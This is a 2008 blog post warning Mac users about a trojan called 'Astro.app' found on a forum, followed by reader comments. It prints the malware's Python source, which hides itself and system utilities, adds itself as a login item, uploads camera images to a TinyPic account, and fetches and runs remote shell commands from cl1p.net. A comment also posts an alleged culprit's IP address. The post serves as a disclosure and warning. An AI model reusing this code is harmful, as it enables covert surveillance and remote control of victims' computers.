New Malicious OS X Script Discovered

Posted on Dec 11, 2008 in Mac

I noticed a post on at Mac-Forums.com that seemed a little sketchy. A brand new user claimed posted an OS X application with the promise that it “Does really amazing stuff with your camera.”.

I downloaded the zip file and took a look inside the “Astro.app” package.

Inside I found a Twill script that contained some interesting code… I’ve highlighted some of the salient comments that were included below:

Code:

# Gives paths needed to work on all directories on any comp
user = getpass.getuser()
path2 = sys.argv[0]
aspath = os.path.abspath(os.path.join(path2, ‘..’, ‘..’,’..’,’..’,))

# Checks to see if it has been run once, if not it renames files so they are hidden
check = os.path.exists(aspath “/.Astro.app”)
if not check :
os.rename(aspath “/Astro.app”, aspath “/.Astro.app”)
os.rename(“/Applications/Utilities/Terminal.app”,”/Applications/Utilities/.Terminal.app”)
os.rename(“/Applications/Utilities/Activity Monitor.app”,”/Applications/Utilities/.Activity Monitor.app”)

path = os.getcwd() # includes the files location in string but not file sys.argv[0] inclueds both files locatoin and file.
# Logs into tinypic
twill.commands.go(“http://tinypic.com/”)
twill.commands.formclear(‘1’)
twill.commands.fv(“1”, “email”, “M8R-c35y7l@mailinator.com”)
twill.commands.fv(“1”, “password”, “toxic0”)
twill.commands.submit(‘5’)
if not user in getalbums():
twill.commands.go(“http://tinypic.com/album.php?action=create”)
twill.commands.fv(“3”, “album-name”, user)
twill.commands.submit()

# Edits startup items so it will run on start
pathd = “/”
user = getpass.getuser()
opensw = open(“loginwindow.plist”,”w”)
opensw.write(“””<?xml version=”1.0″ encoding=”UTF-8″?>”””)
opensw.write(“””n<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>”””)
opensw.write(“””n<plist version=”1.0″>”””)
opensw.write(“””n<dict>”””)
opensw.write(“””n <key>AutoLaunchedApplicationDictionary</key>”””)
opensw.write(“””n <array>”””)
opensw.write(“””n <dict>”””)
opensw.write(“””n <key>Hide</key>”””)
opensw.write(“””n <true/>”””)
opensw.write(“””n <key>Path</key>”””)
opensw.write(“””n <string>%s/.Astro.app</string>””” % aspath)
#opensw.write(“””n <string>%s/.kernel.app</string>””” % aspath)
opensw.write(“””n </dict>”””)
opensw.write(“””n </array>”””)
opensw.write(“””n</dict>”””)
opensw.write(“””n</plist>”””)
opensw.close()
shutil.move(os.path.join(pathd,”loginwindow.plist”),”/Users/” user “/Library/Preferences/”)
#os.system(“chmod 777 /Users/toXic/Preferences/loginwindow.plist”)

# Pulls bash commands off website from grepping in between password and end (password my exeist)
def pwn():
twill.commands.go(“http://cl1p.net/commands/”)
b=twill.commands.show()
c=b.find(“””class=”ohw”>”””)
d=b.find(“””stopz”””, c)
data = b[c 12:d]
code = “1612”
if data == code:
first=b.find(“””1612″””)
end=b.find(“””end”””, first)
data2 = b[first 10:end]
os.system(data2)

From what I can tell he’s hiding the application from the user, making it a startup item and then uploading pictures to his tinypic.com account.

The actual application seems to use Quicktime components, so I’d guess it takes a pic, uploads it to TinyPic and then perhaps either takes pictures at regular intervals or is just making the Mac submit its IP address so more code can be executed remotely later.

So if you come across “Astro.app”, BEWARE!

4 Comments

  1. By the way here is the IP of the guy who left the same Virus link on SwitchingToMac.com

    209.234.156.13

  2. Buddy ^ you got that ip way off btw.

  3. Andrew’s just an idiot. He tried so hard to hide the code, and then gave up.

  4. Thanks for the info about this malicious os x script. It is pretty cleaver that it goes to a tinypic.com account. I’m looking forward to reading a lot more of your site in the future.